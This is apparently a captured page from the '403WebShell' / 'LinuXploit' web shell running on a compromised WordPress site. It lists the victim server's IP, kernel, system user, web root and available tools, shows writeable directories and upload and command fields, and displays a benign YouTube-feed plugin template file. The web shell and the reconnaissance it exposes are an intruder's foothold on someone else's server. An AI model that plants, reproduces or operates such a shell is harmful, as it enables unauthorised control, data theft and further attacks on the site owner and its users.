Uname:Linux marissa.metanet.ch 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64

Base Dir : /home/httpd/vhosts/comeonline.ch/httpdocs

User : onlineadmin


403WebShell
403Webshell
Server IP : 80.74.154.100  /  Your IP : 216.73.217.0
Web Server : Apache
System : Linux marissa.metanet.ch 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64
User : onlineadmin ( 10487)
PHP Version : 8.5.7
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/httpd/vhosts/comeonline.ch/httpdocs/wp-content/plugins/feeds-for-youtube/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/vhosts/comeonline.ch/httpdocs/wp-content/plugins/feeds-for-youtube/templates/footer.php
<?php

// Don't load directly
use SmashBalloon\YouTubeFeed\SBY_Display_Elements;
use SmashBalloon\YouTubeFeed\SBY_Parse;

if ( ! defined( 'ABSPATH' ) ) {
	die( '-1' );
}
$subscribe_url = isset( $posts[0] ) ? SBY_Parse::get_channel_permalink( $posts[0] ) : '';

$sub_btn_style   = SBY_Display_Elements::get_subscribe_styles( $settings ); // style="background: rgb();color: rgb();"  already escaped
$sub_btn_classes = strpos( $sub_btn_style, 'background' ) !== false ? ' sby_custom' : '';
$show_subscribe_button = $settings['showsubscribe'];
$subscribe_button_text = $settings['subscribetext'];

$load_btn_style   = SBY_Display_Elements::get_load_button_styles( $settings ); // style="background: rgb();color: rgb();" already escaped
$load_btn_classes = strpos( $load_btn_style, 'background' ) !== false ? ' sby_custom' : '';
$load_button_text = __( $settings['buttontext'], 'feeds-for-youtube' );
?>
<div class="sby_footer">

<?php if ( $use_pagination || sby_doing_customizer( $settings ) ) : ?>
    <button type="button" aria-label="Load more content" class="sby_load_btn" <?php echo $load_btn_style; ?> <?php echo SBY_Display_Elements::get_button_data_attributes( $settings ); ?>>
        <span class="sby_btn_text" <?php echo SBY_Display_Elements::get_load_button_attribute( $settings ); ?>><?php echo esc_html( $load_button_text ); ?></span>
        <span class="sby_loader sby_hidden" style="background-color: rgb(255, 255, 255);"></span>
    </button>
<?php endif; ?>

<?php if ( ($first_username && $show_subscribe_button) || sby_doing_customizer( $settings ) ) : ?>
    <span 
        class="sby_follow_btn<?php echo esc_attr( $sub_btn_classes ); ?>" 
        <?php echo SBY_Display_Elements::get_subscribe_button_data_attributes( $settings ); ?>
    >
        <a 
            href="<?php echo esc_url( $subscribe_url ); ?>"
            <?php echo $sub_btn_style; ?> 
            target="_blank" 
            rel="noopener"
        >
            <?php echo SBY_Display_Elements::get_icon( 'youtube', $icon_type ); ?>
            <span <?php echo SBY_Display_Elements::get_subscribe_button_attribute( $settings ); ?> >
                <?php echo esc_html( $subscribe_button_text ); ?>
            </span>
        </a>
    </span>
<?php endif; ?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit